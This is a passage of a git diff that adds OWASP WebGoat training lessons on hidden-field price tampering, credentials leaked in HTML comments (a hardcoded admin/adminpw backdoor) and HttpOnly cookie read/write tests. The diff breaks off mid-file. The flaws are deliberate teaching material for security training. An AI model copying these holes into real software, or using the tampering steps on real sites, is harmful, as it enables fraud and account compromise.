+		    profile = new Employee(answer_results.getInt("userid"),
+			    answer_results.getString("first_name"),
+			    answer_results.getString("last_name"),
+			    answer_results.getString("ssn"), answer_results
+				    .getString("title"), answer_results
+				    .getString("phone"), answer_results
+				    .getString("address1"), answer_results
+				    .getString("address2"), answer_results
+				    .getInt("manager"), answer_results
+				    .getString("start_date"), answer_results
+				    .getInt("salary"), answer_results
+				    .getString("ccn"), answer_results
+				    .getInt("ccn_limit"), answer_results
+				    .getString("disciplined_date"),
+			    answer_results.getString("disciplined_notes"),
+			    answer_results.getString("personal_description"));
+		    /*					System.out.println("Retrieved employee from db: " + 
+		     profile.getFirstName() + " " + profile.getLastName() + 
+		     " (" + profile.getId() + ")");
+		     */}
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error getting employee profile");
+		sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error getting employee profile");
+	    e.printStackTrace();
+	}
+
+	return profile;
+    }
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/HiddenFieldTampering.java b/main/project/JavaSource/org/owasp/webgoat/lessons/HiddenFieldTampering.java
new file mode 100644
index 000000000..8d11272b3
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/HiddenFieldTampering.java
@@ -0,0 +1,242 @@
+package org.owasp.webgoat.lessons;
+
+import java.util.ArrayList;
+import java.util.List;
+import java.util.regex.Pattern;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.A;
+import org.apache.ecs.html.B;
+import org.apache.ecs.html.BR;
+import org.apache.ecs.html.Center;
+import org.apache.ecs.html.H1;
+import org.apache.ecs.html.IMG;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.P;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TH;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ * 
+ * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created October 28, 2003
+*/
+public class HiddenFieldTampering extends LessonAdapter
+{
+	public final static A ASPECT_LOGO =
+			new A().setHref("http://www.aspectsecurity.com").addElement(
+																		new IMG("images/logos/aspect.jpg")
+																				.setAlt("Aspect Security").setBorder(0)
+																				.setHspace(0).setVspace(0));
+
+	private final static String PRICE = "Price";
+
+	private final static String PRICE_TV = "2999.99";
+
+	private final static String PRICE_TV_HACKED = "9.99";
+
+	String regex = "^" + PRICE_TV + "$";   // obviously the "." will match any char - any interesting exploit!
+	Pattern pattern1 = Pattern.compile(regex);
+	String lineSep = System.getProperty("line.separator");
+	String script =
+			"<SCRIPT>"  + lineSep + "regex=/" + regex + "/;" + "function validate() { " + lineSep
+					+ "if (!regex.test(document.form." + PRICE + ".value)) {alert('Data tampering is disallowed'); "
+					+" document.form." + PRICE + ".value = " + PRICE_TV + ";}"
+					+ lineSep + "else document.form.submit();" + lineSep + "} " + lineSep + "</SCRIPT>" + lineSep;
+
+	/**
+	 * Constructor for the HiddenFieldScreen object
+	 */
+	public HiddenFieldTampering()
+	{
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
+		ec.addElement(new StringElement(script));
+		float quantity;
+		float total;
+		String price = PRICE_TV;
+		try
+		{
+			price = s.getParser().getRawParameter(PRICE, PRICE_TV);
+			quantity = s.getParser().getFloatParameter("QTY", 1.0f);
+			total = quantity * Float.parseFloat(price);
+		}
+		catch (Exception e)
+		{
+			s.setMessage("Invaild data " + this.getClass().getName());
+			price = PRICE_TV;
+			quantity = 1.0f;
+			total = quantity * Float.parseFloat(PRICE_TV);
+
+		}
+
+		if (price.equals(PRICE_TV))
+		{
+			ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart ")));
+			ec.addElement(new BR());
+			Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center");
+
+			if (s.isColor())
+			{
+				t.setBorder(1);
+			}
+
+			TR tr = new TR();
+			tr.addElement(new TH().addElement("Shopping Cart Items -- To Buy Now").setWidth("80%"));
+			tr.addElement(new TH().addElement("Price:").setWidth("10%"));
+			tr.addElement(new TH().addElement("Quantity:").setWidth("3%"));
+			tr.addElement(new TH().addElement("Total").setWidth("7%"));
+			t.addElement(tr);
+
+			tr = new TR();
+			tr.addElement(new TD().addElement("56 inch HDTV (model KTV-551)"));
+			tr.addElement(new TD().addElement(PRICE_TV).setAlign("right"));
+			tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY", 1)).setAlign("right"));
+			tr.addElement(new TD().addElement("$" + total));
+			t.addElement(tr);
+
+			ec.addElement(t);
+
+			t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
+
+			if (s.isColor())
+			{
+				t.setBorder(1);
+			}
+
+			ec.addElement(new BR());
+			tr = new TR();
+			tr.addElement(new TD().addElement("The total charged to your credit card:"));
+			tr.addElement(new TD().addElement("$" + total));
+			tr.addElement(new TD().addElement(ECSFactory.makeButton("Update Cart")));
+			tr.addElement(new TD().addElement(ECSFactory.makeButton("Purchase", "validate()")));
+			t.addElement(tr);
+
+			ec.addElement(t);
+
+			Input input = new Input(Input.HIDDEN, PRICE, PRICE_TV);
+			ec.addElement(input);
+			ec.addElement(new BR());
+
+		} else
+		{
+			if (!price.toString().equals(PRICE_TV))
+			{
+				makeSuccess(s);
+			}
+
+			ec.addElement(new P().addElement("Your total price is:"));
+			ec.addElement(new B("$" + total));
+			ec.addElement(new BR());
+			ec.addElement(new P().addElement("This amount will be charged to your credit card immediately."));
+		}
+
+		return (ec);
+	}
+
+	/**
+	 * DOCUMENT ME!
+	 * 
+	 * @return DOCUMENT ME!
+	 */
+	protected Category getDefaultCategory()
+	{
+		return Category.UNVALIDATED_PARAMETERS;
+	}
+
+	/**
+	 * Gets the hints attribute of the HiddenFieldScreen object
+	 * 
+	 * @return The hints value
+	 */
+	protected List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
+		hints.add("This application is using hidden fields to transmit price information to the server.");
+		hints.add("Use a program to intercept and change the value in the hidden field.");
+		hints
+				.add("Use <A href=\"http://www.owasp.org/development/webscarab\">WebScarab</A> to change the price of the TV from "
+					 + PRICE_TV + " to " + PRICE_TV_HACKED + ".");
+
+		return hints;
+	}
+
+	/**
+	 * Gets the instructions attribute of the HiddenFieldTampering object
+	 * 
+	 * @return The instructions value
+	 */
+	public String getInstructions(WebSession s)
+	{
+		String instructions =
+				"Try to purchase the HDTV for less than the purchase price, if you have not done so already.";
+
+		return (instructions);
+	}
+
+	private final static Integer DEFAULT_RANKING = new Integer(50);
+
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
+
+	/**
+	 * Gets the title attribute of the HiddenFieldScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Exploit Hidden Fields");
+	}
+
+	public Element getCredits()
+	{
+		return super.getCustomCredits("", ASPECT_LOGO);
+	}
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/HtmlClues.java b/main/project/JavaSource/org/owasp/webgoat/lessons/HtmlClues.java
new file mode 100644
index 000000000..a18af7a8f
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/HtmlClues.java
@@ -0,0 +1,260 @@
+package org.owasp.webgoat.lessons;
+
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.A;
+import org.apache.ecs.html.B;
+import org.apache.ecs.html.Comment;
+import org.apache.ecs.html.H1;
+import org.apache.ecs.html.IMG;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.P;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TH;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created    October 28, 2003
+ */
+public class HtmlClues extends LessonAdapter
+{
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
+	
+    /**
+     *  Description of the Field
+     */
+    protected final static String PASSWORD = "Password";
+
+    /**
+     *  Description of the Field
+     */
+    protected final static String USERNAME = "Username";
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    private boolean backdoor(WebSession s)
+    {
+	String username = s.getParser().getRawParameter(USERNAME, "");
+	String password = s.getParser().getRawParameter(PASSWORD, "");
+
+	//<START_OMIT_SOURCE>
+	return (username.equals("admin") && password.equals("adminpw"));
+	//<END_OMIT_SOURCE>
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element createContent(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+
+	try
+	{
+	    //<START_OMIT_SOURCE>
+	    ec.addElement(new Comment("FIXME admin:adminpw"));
+	    //<END_OMIT_SOURCE>
+	    ec.addElement(new Comment("Use Admin to regenerate database"));
+
+	    if (backdoor(s))
+	    {
+		makeSuccess(s);
+
+		s.setMessage("BINGO -- admin authenticated");
+		ec.addElement(makeUser(s, "jsnow", "CREDENTIALS"));
+	    }
+	    else
+	    {
+		ec.addElement(makeLogin(s));
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	}
+
+	return (ec);
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s              Description of the Parameter
+     * @param  user           Description of the Parameter
+     * @param  method         Description of the Parameter
+     * @return                Description of the Return Value
+     * @exception  Exception  Description of the Exception
+     */
+    protected Element makeUser(WebSession s, String user, String method)
+	    throws Exception
+    {
+	ElementContainer ec = new ElementContainer();
+	ec.addElement(new P().addElement("Welcome, " + user));
+	ec.addElement(new P().addElement("You have been authenticated with "
+		+ method));
+
+	return (ec);
+    }
+
+
+    protected Element makeLogin(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+
+	ec.addElement(new H1().addElement("Sign In "));
+	Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0)
+		.setWidth("90%").setAlign("center");
+
+	if (s.isColor())
+	{
+	    t.setBorder(1);
+	}
+
+	TR tr = new TR();
+	tr
+		.addElement(new TH()
+			.addElement(
+				"Please sign in to your account.  See the OWASP admin if you do not have an account.")
+			.setColSpan(2).setAlign("left"));
+	t.addElement(tr);
+
+	tr = new TR();
+	tr.addElement(new TD().addElement("*Required Fields").setWidth("30%"));
+	t.addElement(tr);
+
+	tr = new TR();
+	tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
+	t.addElement(tr);
+
+	TR row1 = new TR();
+	TR row2 = new TR();
+	row1.addElement(new TD(new B(new StringElement("*User Name: "))));
+	row2.addElement(new TD(new B(new StringElement("*Password: "))));
+
+	Input input1 = new Input(Input.TEXT, USERNAME, "");
+	Input input2 = new Input(Input.PASSWORD, PASSWORD, "");
+	row1.addElement(new TD(input1));
+	row2.addElement(new TD(input2));
+	t.addElement(row1);
+	t.addElement(row2);
+
+	Element b = ECSFactory.makeButton("Login");
+	t.addElement(new TR(new TD(b)));
+	ec.addElement(t);
+
+	return (ec);
+    }
+
+
+    /**
+     *  Gets the hints attribute of the CluesScreen object
+     *
+     * @return    The hints value
+     */
+    protected List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+	hints
+		.add("You can view the HTML source by selecting 'view source' in the browser menu.");
+	hints.add("There are lots of clues in the HTML");
+	hints
+		.add("Search for the word HIDDEN, look at URLs, look for comments.");
+
+	return hints;
+    }
+
+
+    /**
+     *  Gets the instructions attribute of the HtmlClues object
+     *
+     * @return    The instructions value
+     */
+    public String getInstructions(WebSession s)
+    {
+	String instructions = "Below is an example of a forms based authentication form.  Look for clues to help you log in.";
+
+	return (instructions);
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(30);
+
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the category attribute of the FailOpenAuthentication object
+     *
+     * @return    The category value
+     */
+    protected Category getDefaultCategory()
+    {
+	return Category.CODE_QUALITY;
+    }
+
+
+    /**
+     *  Gets the title attribute of the CluesScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return ("Discover Clues in the HTML");
+    }
+    
+    public Element getCredits()
+    {
+    	return super.getCustomCredits("", ASPECT_LOGO);
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/HttpBasics.java b/main/project/JavaSource/org/owasp/webgoat/lessons/HttpBasics.java
new file mode 100644
index 000000000..8836562c8
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/HttpBasics.java
@@ -0,0 +1,136 @@
+package org.owasp.webgoat.lessons;
+
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.Input;
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created October 28, 2003
+ */
+public class HttpBasics extends LessonAdapter
+{
+    private final static String PERSON = "person";
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element createContent(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+
+	StringBuffer person = null;
+	try
+	{
+	    ec.addElement(new StringElement("Enter your name: "));
+
+	    person = new StringBuffer(s.getParser().getStringParameter(PERSON,
+		    ""));
+	    person.reverse();
+
+	    Input input = new Input(Input.TEXT, PERSON, person.toString());
+	    ec.addElement(input);
+
+	    Element b = ECSFactory.makeButton("Go!");
+	    ec.addElement(b);
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    e.printStackTrace();
+	}
+
+	if (!person.toString().equals("")
+		&& getLessonTracker(s).getNumVisits() > 3)
+	{
+	    makeSuccess(s);
+	}
+
+	return (ec);
+    }
+
+
+    /**
+     *  Gets the hints attribute of the HelloScreen object
+     *
+     * @return    The hints value
+     */
+    public List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+	hints.add("Type in your name and press 'go'");
+	hints.add("Turn on Show Parameters or other features");
+	hints.add("Press the Show Lesson Plan button to view a lesson summary");
+	hints.add("Press the Show Solution button to view a lesson solution");
+
+	return hints;
+    }
+
+    /**
+     *  Gets the ranking attribute of the HelloScreen object
+     *
+     * @return    The ranking value
+     */
+    private final static Integer DEFAULT_RANKING = new Integer(10);
+
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    protected Category getDefaultCategory()
+    {
+	return Category.GENERAL;
+    }
+
+
+    /**
+     *  Gets the title attribute of the HelloScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return ("Http Basics");
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/HttpOnly.java b/main/project/JavaSource/org/owasp/webgoat/lessons/HttpOnly.java
new file mode 100644
index 000000000..a28ea80db
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/HttpOnly.java
@@ -0,0 +1,437 @@
+package org.owasp.webgoat.lessons;
+
+import java.util.ArrayList;
+import java.util.Date;
+import java.util.List;
+import java.security.MessageDigest;
+
+import javax.servlet.http.HttpServletResponse;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.A;
+import org.apache.ecs.html.Form;
+import org.apache.ecs.html.IMG;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+import org.owasp.webgoat.session.WebSession;
+
+import sun.misc.BASE64Encoder;
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class HttpOnly extends LessonAdapter {
+	
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
+	
+	private final static Integer DEFAULT_RANKING = new Integer(125);
+	
+	private final static String UNIQUE2U = "unique2u";
+	
+	private final static String HTTPONLY = "httponly";
+	
+	private final static String ACTION = "action";
+	
+	private final static String READ = "Read Cookie";
+	
+	private final static String WRITE = "Write Cookie";
+	
+	private final static String READ_RESULT = "read_result";
+	
+	private boolean httpOnly = false;
+	
+	private boolean readSuccess = false;
+	
+	private boolean writeSuccess = false;
+	
+	private String original = "undefined";
+	
+	/**
+	 *  Gets the title attribute of the EmailScreen object
+	 *
+	 * @return    The title value
+	 */
+	public String getTitle()
+	{
+		return ( "HTTPOnly Test" );
+	}
+
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
+	
+	/**
+	 *  Description of the Method
+	 *
+	 * @param  s  Description of the Parameter
+	 * @return    Description of the Return Value
+	 */
+
+	protected Element createContent( WebSession s )
+	{
+		ElementContainer ec = new ElementContainer();
+		String action = null;
+		String http = null;
+		
+		http = s.getRequest().getParameter(HTTPONLY);
+		action = s.getRequest().getParameter(ACTION);
+		
+		if(http != null) {
+			httpOnly = Boolean.parseBoolean(http);
+		}
+		
+		if(httpOnly) {
+//			System.out.println("HttpOnly: Setting HttpOnly for cookie");
+			setHttpOnly(s);
+		} else {
+//			System.out.println("HttpOnly: Removing HttpOnly for cookie");
+			removeHttpOnly(s);
+		}
+		
+		if(action != null) {
+			if(action.equals(READ)) {
+				handleReadAction(s);
+			} else if(action.equals(WRITE)) {
+				handleWriteAction(s);
+			} else {
+				//s.setMessage("Invalid Request. Please try again.");
+			}
+		}
+		
+		try
+		{
+			ec.addElement(makeContent(s));
+		}
+		catch ( Exception e )
+		{
+			s.setMessage( "Error generating " + this.getClass().getName() );
+			e.printStackTrace();
+		}
+
+		return ( ec );
+	}
+
+
+	/**
+	 *  DOCUMENT ME!
+	 *
+	 * @return    DOCUMENT ME!
+	 */
+	protected Category getDefaultCategory()
+	{
+		return Category.XSS;
+	}
+
+
+	/**
+	 *  Gets the hints attribute of the EmailScreen object
+	 *
+	 * @return    The hints value
+	 */
+	protected List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
+		hints.add( "Read the directions and try out the buttons." );
+		return hints;
+	}
+	
+	private String createCustomCookieValue() {
+		String value = null;
+		byte[] buffer = null;
+		MessageDigest md = null;
+		BASE64Encoder encoder = new BASE64Encoder();
+		
+		try {
+			md = MessageDigest.getInstance("SHA");
+			buffer = new Date().toString().getBytes();
+			
+			md.update(buffer);
+			value = encoder.encode(md.digest());
+			original = value;
+			
+		} catch (Exception e) {
+			e.printStackTrace();
+		}
+		
+		return value;
+	}
+	
+	private void setHttpOnly(WebSession s) {
+		String value = createCustomCookieValue();
+		HttpServletResponse response = s.getResponse();
+		String cookie = s.getCookie(UNIQUE2U);
+		
+		if(cookie == null || cookie.equals("HACKED")) {
+			response.setHeader("Set-Cookie", UNIQUE2U + "=" + value + "; HttpOnly");
+			original = value;
+		} else {
+			response.setHeader("Set-Cookie", UNIQUE2U + "=" + cookie + "; HttpOnly");
+			original = cookie;
+		}
+	}
+	
+	private void removeHttpOnly(WebSession s) {
+		String value = createCustomCookieValue();
+		HttpServletResponse response = s.getResponse();
+		String cookie = s.getCookie(UNIQUE2U);
+		
+		if(cookie == null || cookie.equals("HACKED")) {
+			response.setHeader("Set-Cookie", UNIQUE2U + "=" + value + ";");
+			original = value;
+		} else {
+			response.setHeader("Set-Cookie", UNIQUE2U + "=" + cookie + ";");
+			original = cookie;
+		}
+	}
+	
+	private ElementContainer makeContent(WebSession s) {
+		ElementContainer ec = new ElementContainer();
+		Element r = null;
+		Table t = null;
+		TR tr = null;
+		Form f = null;
+		
+		ec.addElement(new StringElement(getJavaScript()));
+
+		f = new Form();
+		
+		t = new Table();
+		t.setWidth(500);
+		
+		tr = new TR();
+		
+		tr.addElement(new TD(new StringElement("Your browser appears to be: " + getBrowserType(s))));
+		t.addElement(tr);
+		
+		tr = new TR();
+		t.addElement(tr);
+		
+		tr = new TR();
+		
+		tr.addElement( new TD(new StringElement ("Do you wish to turn HTTPOnly on?")));
+		
+		tr.addElement( new TD(new StringElement ("Yes")));
+		
+		if(httpOnly == true) {
+			r = new Input(Input.RADIO, HTTPONLY, "True" ).addAttribute("Checked", "true");
+		} else {
+			r = new Input(Input.RADIO, HTTPONLY, "True" ).addAttribute("onClick", "document.form.submit()");
+		}
+		
+		tr.addElement(new TD(r));
+		
+		tr.addElement( new TD(new StringElement ("No")));
+		
+		if(httpOnly == false) {
+			r = new Input(Input.RADIO, HTTPONLY, "False").addAttribute("Checked", "True");
+		} else {
+			r = new Input(Input.RADIO, HTTPONLY, "False").addAttribute("onClick", "document.form.submit()");
+		}
+		
+		tr.addElement(new TD(r));
+		
+		r = new Input(Input.HIDDEN, READ_RESULT, "");
+		tr.addElement(r);
+		
+		t.addElement(tr);
+		
+/*		tr.addElement(new TD(new StringElement("<strong>Status:</strong> " )));
+		t.addElement(tr);
+		
+		if(httpOnly == true) {
+			tr.addElement(new TD(new StringElement("<div id=\"status\">On</div>")));
+		} else {
+			tr.addElement(new TD(new StringElement ("<div id=\"status\">Off</div>")));
+		}
+		
+		t.addElement(tr);
+		t.addElement(new TR(new TD(new StringElement("<br/>"))));
+*/		f.addElement(t);
+		
+		t = new Table();
+		tr = new TR();
+		
+		r = new Input(Input.SUBMIT, ACTION, READ).addAttribute("onclick", "myAlert();");
+		tr.addElement(new TD(r));
+		
+		r = new Input(Input.SUBMIT, ACTION, WRITE).addAttribute("onclick", "modifyAlert();");
+		tr.addElement(new TD(r));
+		t.addElement(tr);
+		
+		f.addElement(t);
+		ec.addElement(f);
+		
+		return ec;
+	}
+	
+	private void handleReadAction(WebSession s) {
+		
+		String displayed = s.getRequest().getParameter(READ_RESULT);
+		
+		if(httpOnly == true) {
+			if(displayed.indexOf(UNIQUE2U) != -1) {
+				s.setMessage("FAILURE: Your browser did not enforce the HTTPOnly flag properly for the '" + UNIQUE2U 
+						+ "' cookie. It allowed direct client side read access to this cookie.");
+			} else {
+				s.setMessage("SUCCESS: Your browser enforced the HTTPOnly flag properly for the '" + UNIQUE2U 
+						+ "' cookie by preventing direct client side read access to this cookie.");
+				if (writeSuccess) { 
+					if (!this.isCompleted(s)) {
+						makeSuccess(s);
+						readSuccess = false;
+						writeSuccess = false;
+					}
+				} else {
+					if (!this.isCompleted(s)) {
+						s.setMessage("Now try to see if your browser protects write access to this cookie.");
+						readSuccess = true;
+					}
+				}
+			}
+		} else if(displayed.indexOf(UNIQUE2U) != -1) {
+			s.setMessage("Since HTTPOnly was not enabled, the '" + UNIQUE2U + "' cookie was displayed in the alert dialog.");
+		} else {
+			s.setMessage("Since HTTPOnly was not enabled, the '" + UNIQUE2U 
+					+ "' cookie should have been displayed in the alert dialog, but was not for some reason. "
+					+ "(This shouldn't happen)");
+		}
+	}
+	
+	private void handleWriteAction(WebSession s) {
+		String hacked = s.getCookie(UNIQUE2U);
+		
+		if(httpOnly == true) {
+			if(!original.equals(hacked)) {
+				s.setMessage("FAILURE: Your browser did not enforce the write protection property of the HTTPOnly flag for the '" + UNIQUE2U + "' cookie.");
+				s.setMessage("The " + UNIQUE2U + " cookie was successfully modified to " + hacked + " on the client side.");
+			} else {
+				s.setMessage("SUCCESS: Your browser enforced the write protection property of the HTTPOnly flag for the '" 
+						+ UNIQUE2U + "' cookie by preventing client side modification.");
+				if (readSuccess) { 
+					if (!this.isCompleted(s)) {
+						makeSuccess(s);
+						readSuccess = false;
+						writeSuccess = false;
+					}
+				} else {
+					if (!this.isCompleted(s)) {
+						s.setMessage("Now try to see if your browser protects read access to this cookie.");
+						writeSuccess = true;
+					}
+				}
+			}
+		} else if(!original.equals(hacked)) {
+			s.setMessage("Since HTTPOnly was not enabled, the browser allowed the '" + UNIQUE2U 
+					+ "' cookie to be modified on the client side.");
+		} else {
+			s.setMessage("Since HTTPOnly was not enabled, the browser should have allowed the '" + UNIQUE2U 
+					+ "' cookie to be modified on the client side, but it was not for some reason. "
+					+ "(This shouldn't happen)");
+		}
+	}
+	
+	private String getJavaScript() {
+		StringBuffer buffer = new StringBuffer();
+		
+		buffer.append("<script language=\"javascript\">\n");
+		buffer.append("function myAlert() {\n");
+		buffer.append("alert(document.cookie);\n");
+		buffer.append("document.form.read_result.value=document.cookie;\n");
+		buffer.append("return true;\n");
+		buffer.append("}\n");
+		buffer.append("function modifyAlert() {\n");
+		buffer.append("document.cookie='" + UNIQUE2U + "=HACKED;\';\n");
+		buffer.append("alert(document.cookie);\n");
+		buffer.append("return true;\n");
+		buffer.append("}\n");
+		buffer.append("</script>\n");
+		
+		return buffer.toString();
+	}
+	
+	private String getBrowserType(WebSession s) {
+		int offset = -1;
+		String result = "unknown";
+		String browser = s.getHeader("user-agent").toLowerCase();
+		
+		if(browser != null) {
+			if(browser.indexOf("firefox") != -1) {
+				browser = browser.substring(browser.indexOf("firefox"));
+				
+				offset = getOffset(browser);
+				
+				result = browser.substring(0, offset);
+			} else if(browser.indexOf("msie 6") != -1) {
+				result = "Internet Explorer 6";
+			} else if(browser.indexOf("msie 7") != -1) {
+				result = "Internet Explorer 7";
